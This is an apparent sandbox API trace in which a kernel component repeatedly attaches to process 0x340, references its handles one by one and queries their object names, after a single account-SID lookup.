[0289.904] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.905] CloseHandle (hObject=0x18c) returned 1 [0289.905] CloseHandle (hObject=0x188) returned 1 [0289.905] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.905] PsAcquireProcessExitSynchronization () returned 0x0 [0289.905] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.905] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069848c90, HandleInformation=0x0) returned 0x0 [0289.905] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.905] PsReleaseProcessExitSynchronization () returned 0x2 [0289.905] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000c [0289.905] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.905] ObfDereferenceObject (Object=0xffffe00069848c90) returned 0x7ffe [0289.905] IoCompleteRequest () returned 0x0 [0289.905] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.905] PsAcquireProcessExitSynchronization () returned 0x0 [0289.905] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.905] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069852300, HandleInformation=0x0) returned 0x0 [0289.905] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.905] PsReleaseProcessExitSynchronization () returned 0x2 [0289.905] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000b [0289.905] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.905] ObfDereferenceObject (Object=0xffffe00069852300) returned 0x7ffb [0289.905] IoCompleteRequest () returned 0x0 [0289.905] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.905] PsAcquireProcessExitSynchronization () returned 0x0 [0289.905] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.905] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069855e40, HandleInformation=0x0) returned 0x0 [0289.905] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.905] PsReleaseProcessExitSynchronization () returned 0x2 [0289.905] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000a [0289.905] ObQueryNameString (in: Object=0xffffe00069855e40, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.905] ObfDereferenceObject (Object=0xffffe00069855e40) returned 0x7ffe [0289.905] IoCompleteRequest () returned 0x0 [0289.905] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.905] PsAcquireProcessExitSynchronization () returned 0x0 [0289.905] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.905] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069876b80, HandleInformation=0x0) returned 0x0 [0289.905] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.905] PsReleaseProcessExitSynchronization () returned 0x2 [0289.905] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40009 [0289.905] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.905] ObfDereferenceObject (Object=0xffffe00069876b80) returned 0x7cad [0289.905] IoCompleteRequest () returned 0x0 [0289.906] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.906] PsAcquireProcessExitSynchronization () returned 0x0 [0289.906] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.906] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006987a570, HandleInformation=0x0) returned 0x0 [0289.906] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.906] PsReleaseProcessExitSynchronization () returned 0x2 [0289.906] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40008 [0289.906] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.906] ObfDereferenceObject (Object=0xffffe0006987a570) returned 0x7fff [0289.906] IoCompleteRequest () returned 0x0 [0289.906] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.906] PsAcquireProcessExitSynchronization () returned 0x0 [0289.906] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.906] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069877140, HandleInformation=0x0) returned 0x0 [0289.906] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.906] PsReleaseProcessExitSynchronization () returned 0x2 [0289.906] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40007 [0289.906] ObQueryNameString (in: Object=0xffffe00069877140, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.906] ObfDereferenceObject (Object=0xffffe00069877140) returned 0x7ffd [0289.906] IoCompleteRequest () returned 0x0 [0289.906] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.906] PsAcquireProcessExitSynchronization () returned 0x0 [0289.906] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.906] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069877660, HandleInformation=0x0) returned 0x0 [0289.906] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.906] PsReleaseProcessExitSynchronization () returned 0x2 [0289.906] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40006 [0289.906] ObQueryNameString (in: Object=0xffffe00069877660, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.906] ObfDereferenceObject (Object=0xffffe00069877660) returned 0x7ffd [0289.906] IoCompleteRequest () returned 0x0 [0289.906] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.906] PsAcquireProcessExitSynchronization () returned 0x0 [0289.906] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.906] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069896f20, HandleInformation=0x0) returned 0x0 [0289.906] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.906] PsReleaseProcessExitSynchronization () returned 0x2 [0289.906] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40005 [0289.906] ObQueryNameString (in: Object=0xffffe00069896f20, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.906] ObfDereferenceObject (Object=0xffffe00069896f20) returned 0x7ffd [0289.906] IoCompleteRequest () returned 0x0 [0289.906] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.906] PsAcquireProcessExitSynchronization () returned 0x0 [0289.906] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.906] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069896920, HandleInformation=0x0) returned 0x0 [0289.906] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.907] PsReleaseProcessExitSynchronization () returned 0x2 [0289.907] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40004 [0289.907] ObQueryNameString (in: Object=0xffffe00069896920, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.907] ObfDereferenceObject (Object=0xffffe00069896920) returned 0x7ffd [0289.907] IoCompleteRequest () returned 0x0 [0289.907] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.907] PsAcquireProcessExitSynchronization () returned 0x0 [0289.907] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.907] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069884ab0, HandleInformation=0x0) returned 0x0 [0289.907] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.907] PsReleaseProcessExitSynchronization () returned 0x2 [0289.907] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40003 [0289.907] ObQueryNameString (in: Object=0xffffe00069884ab0, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.907] ObfDereferenceObject (Object=0xffffe00069884ab0) returned 0x7ffd [0289.907] IoCompleteRequest () returned 0x0 [0289.907] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.907] PsAcquireProcessExitSynchronization () returned 0x0 [0289.907] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.907] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069885ac0, HandleInformation=0x0) returned 0x0 [0289.907] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.907] PsReleaseProcessExitSynchronization () returned 0x2 [0289.907] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40002 [0289.907] ObQueryNameString (in: Object=0xffffe00069885ac0, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.907] ObfDereferenceObject (Object=0xffffe00069885ac0) returned 0x7ff2 [0289.907] IoCompleteRequest () returned 0x0 [0289.907] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.907] PsAcquireProcessExitSynchronization () returned 0x0 [0289.907] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.907] ObReferenceObjectByHandle (in: Handle=0x214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006988cf20, HandleInformation=0x0) returned 0x0 [0289.907] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.907] PsReleaseProcessExitSynchronization () returned 0x2 [0289.907] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40001 [0289.907] ObQueryNameString (in: Object=0xffffe0006988cf20, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.907] ObfDereferenceObject (Object=0xffffe0006988cf20) returned 0x7ff4 [0289.907] IoCompleteRequest () returned 0x0 [0289.907] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.907] PsAcquireProcessExitSynchronization () returned 0x0 [0289.907] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.907] ObReferenceObjectByHandle (in: Handle=0x230, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069890dc0, HandleInformation=0x0) returned 0x0 [0289.907] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.907] PsReleaseProcessExitSynchronization () returned 0x2 [0289.907] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40000 [0289.907] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.907] ObfDereferenceObject (Object=0xffffe00069890dc0) returned 0x8002 [0289.907] IoCompleteRequest () returned 0x0 [0289.908] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.908] PsAcquireProcessExitSynchronization () returned 0x0 [0289.908] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.908] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006986ff20, HandleInformation=0x0) returned 0x0 [0289.908] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.908] PsReleaseProcessExitSynchronization () returned 0x2 [0289.908] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffff [0289.908] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.908] ObfDereferenceObject (Object=0xffffe0006986ff20) returned 0x8008 [0289.908] IoCompleteRequest () returned 0x0 [0289.908] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.908] PsAcquireProcessExitSynchronization () returned 0x0 [0289.908] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.908] ObReferenceObjectByHandle (in: Handle=0x238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000804d4880, HandleInformation=0x0) returned 0x0 [0289.908] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.908] PsReleaseProcessExitSynchronization () returned 0x2 [0289.908] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffe [0289.908] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.908] ObfDereferenceObject (Object=0xffffe000804d4880) returned 0x800e [0289.908] IoCompleteRequest () returned 0x0 [0289.908] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.908] PsAcquireProcessExitSynchronization () returned 0x0 [0289.908] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.908] ObReferenceObjectByHandle (in: Handle=0x240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698944f0, HandleInformation=0x0) returned 0x0 [0289.908] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.908] PsReleaseProcessExitSynchronization () returned 0x2 [0289.908] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffd [0289.908] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.908] ObfDereferenceObject (Object=0xffffe000698944f0) returned 0x800a [0289.908] IoCompleteRequest () returned 0x0 [0289.908] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.908] PsAcquireProcessExitSynchronization () returned 0x0 [0289.908] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.908] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698925f0, HandleInformation=0x0) returned 0x0 [0289.908] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.908] PsReleaseProcessExitSynchronization () returned 0x2 [0289.908] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffc [0289.908] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.908] ObfDereferenceObject (Object=0xffffe000698925f0) returned 0x800e [0289.908] IoCompleteRequest () returned 0x0 [0289.908] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.908] PsAcquireProcessExitSynchronization () returned 0x0 [0289.908] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.908] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697ae780, HandleInformation=0x0) returned 0x0 [0289.908] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.909] PsReleaseProcessExitSynchronization () returned 0x2 [0289.909] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffb [0289.909] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.909] ObfDereferenceObject (Object=0xffffe000697ae780) returned 0x800e [0289.909] IoCompleteRequest () returned 0x0 [0289.909] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.909] PsAcquireProcessExitSynchronization () returned 0x0 [0289.909] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.909] ObReferenceObjectByHandle (in: Handle=0x250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000804d4660, HandleInformation=0x0) returned 0x0 [0289.909] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.909] PsReleaseProcessExitSynchronization () returned 0x2 [0289.909] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffa [0289.909] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.909] ObfDereferenceObject (Object=0xffffe000804d4660) returned 0x800e [0289.909] IoCompleteRequest () returned 0x0 [0289.909] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.909] PsAcquireProcessExitSynchronization () returned 0x0 [0289.909] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.909] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069895e20, HandleInformation=0x0) returned 0x0 [0289.909] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.909] PsReleaseProcessExitSynchronization () returned 0x2 [0289.909] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff9 [0289.909] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.909] ObfDereferenceObject (Object=0xffffe00069895e20) returned 0x800e [0289.909] IoCompleteRequest () returned 0x0 [0289.909] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.909] PsAcquireProcessExitSynchronization () returned 0x0 [0289.909] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.909] ObReferenceObjectByHandle (in: Handle=0x264, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006984cf20, HandleInformation=0x0) returned 0x0 [0289.909] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.909] PsReleaseProcessExitSynchronization () returned 0x2 [0289.909] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff8 [0289.909] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.909] ObfDereferenceObject (Object=0xffffe0006984cf20) returned 0x800a [0289.909] IoCompleteRequest () returned 0x0 [0289.909] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.909] PsAcquireProcessExitSynchronization () returned 0x0 [0289.909] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.909] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000804d42d0, HandleInformation=0x0) returned 0x0 [0289.909] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.909] PsReleaseProcessExitSynchronization () returned 0x2 [0289.909] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff7 [0289.909] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.909] ObfDereferenceObject (Object=0xffffe000804d42d0) returned 0x800e [0289.910] IoCompleteRequest () returned 0x0 [0289.910] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.910] PsAcquireProcessExitSynchronization () returned 0x0 [0289.910] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.910] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00072a33490, HandleInformation=0x0) returned 0x0 [0289.910] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.910] PsReleaseProcessExitSynchronization () returned 0x2 [0289.910] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff6 [0289.910] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.910] ObfDereferenceObject (Object=0xffffe00072a33490) returned 0x800e [0289.910] IoCompleteRequest () returned 0x0 [0289.910] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 